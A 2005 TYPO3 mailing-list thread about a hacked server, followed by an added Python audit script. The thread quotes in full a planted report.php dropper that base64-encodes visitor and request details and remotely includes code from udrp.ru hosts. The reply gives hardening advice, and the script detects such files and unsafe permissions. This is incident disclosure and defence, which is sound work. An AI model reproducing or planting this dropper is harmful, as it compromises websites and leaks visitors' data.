[Typo3] server hacked // report.php

Dmitry Dulepov typo3 at fm-world.ru
Thu Jul 21 21:33:01 CEST 2005


Hi!

chmod 777 is a big security risk. This is, most likely, the problem.

You can also strengthen site security by putting the following .htaccess
in some folders:
---------
php_flag engine off
---------
It will disable execution of PHP scripts there. At least the following
folders should be secured this way:
/fileadmin
/typo3temp
/uploads

Dmitry.

Christoph Koehler wrote:
> Pretty sure it's not in the source...
> The contents of the file make a really long string of base64 encoded
> info, like host, request url and queries and all, and somehow also have
> these urls base64 decoded in them:
> http://doc1.udrp.ru
> http://doc3.udrp.ru
> It also does this:
> error_reporting(0);
> ini_set(allow_url_fopen,1);
> 
> This is the whole content:
> <? php
> error_reporting(0);
> ini_set(allow_url_fopen,1);
> $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
> $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : 
> $SERVER_NAME);
> $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : 
> $REQUEST_URI);
> $d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
> $e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : 
> $QUERY_STRING);
> $f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : 
> $HTTP_REFERER);
> $g=(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 
> $HTTP_USER_AGENT);
> $h=(isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 
> $REMOTE_ADDR);
> $str=base64_encode($a).'.'.base64_encode($b).'.'.base64_encode($c).'.'.base64_encode($d).'.'.base64_encode($e).'.'.base64_encode($f).'.'.base64_encode($g).'.'.base64_encode($h);
> 
> if 
> ((include(base64_decode('aHR0cDovLw==').base64_decode('ZG9jMS51ZHJwLnJ1')."/?".$str))) 
> {}
> else {
>     include(base64_decode('aHR0cDovLw==').base64_decode('ZG9jMy51ZHJwLnJ1')."/?".$str);
> 
> }
> ?>
> 
> The weird thing is those files have been there for a month! They are in 
> all my old backups...
> Most directories were 777 chmod. I installed it through
> fantastico...guess I won't do that anymore!
> 
> On Thu, 21 Jul 2005 11:31:26 -0500, Christoph Koehler 
> <christoph.koehler at gmail.com> wrote:
> 
>> I actually noticed many .php files with this content in it and the 
>> htaccess file. Another one was called test.php
>>
>>
>> On Thu, 21 Jul 2005 11:25:16 -0500, Christoph Koehler 
>> <christoph.koehler at gmail.com> wrote:
>>
>>> Hey there,
>>>
>>> I have reason to believe that the server we host typo3 on has been 
>>> hacked.
>>> Now, in my typo3 directory, I see a file report.php, with an
>>> .htaccess file making it the 404 error document.
>>> Does anyone else have that file??
>>>
>>> Thanks!
>>>
>>> Christoph
>>
>>
> 
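
An added example, not part of the original thread and not TYPO3 code: a small Python audit for the three points raised above. It flags any of /fileadmin, /typo3temp and /uploads that lack "php_flag engine off", world-writable directories, and .php files that include() a base64-decoded string like the quoted report.php. The function names, finding labels and sample tree are assumptions made for this illustration.

```python
import os
import re
import tempfile
from pathlib import Path

# Folders the post says should carry "php_flag engine off".
UPLOAD_DIRS = ("fileadmin", "typo3temp", "uploads")
ENGINE_OFF = re.compile(r"^\s*php_flag\s+engine\s+off\s*$", re.I | re.M)
# Shape of the dropped file quoted in the thread: include(base64_decode(...)).
DROPPER = re.compile(rb"include\s*\(\s*base64_decode\s*\(")


def audit(webroot):
    """Return sorted (issue, path) findings for a TYPO3 web root."""
    findings = []
    for name in UPLOAD_DIRS:
        top = Path(webroot, name)
        ht = top / ".htaccess"
        text = ht.read_text(errors="replace") if ht.is_file() else ""
        if top.is_dir() and not ENGINE_OFF.search(text):
            findings.append(("php-engine-on", str(top)))
    for dirpath, _dirs, files in os.walk(webroot):
        if os.stat(dirpath).st_mode & 0o002:  # world-writable, e.g. chmod 777
            findings.append(("world-writable", dirpath))
        for fn in files:
            path = Path(dirpath, fn)
            if fn.lower().endswith(".php") and DROPPER.search(path.read_bytes()):
                findings.append(("include-base64", str(path)))
    return sorted(findings)


def make_sample_tree():
    """Build a small constructed web root for the demo (not real data)."""
    root = Path(tempfile.mkdtemp())
    for name, mode in (("fileadmin", 0o755), ("uploads", 0o777)):
        (root / name).mkdir()
        (root / name).chmod(mode)
    (root / "fileadmin" / ".htaccess").write_text("php_flag engine off\n")
    (root / "uploads" / "report.php").write_text("<?php include(base64_decode($x)); ?>\n")
    return str(root)


if __name__ == "__main__":
    for issue, path in audit(make_sample_tree()):
        print(issue, path)
```

php_flag only takes effect when PHP runs as an Apache module and AllowOverride permits it for that directory, so confirm on the server that scripts in those folders really are not executed rather than relying on the file being present.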


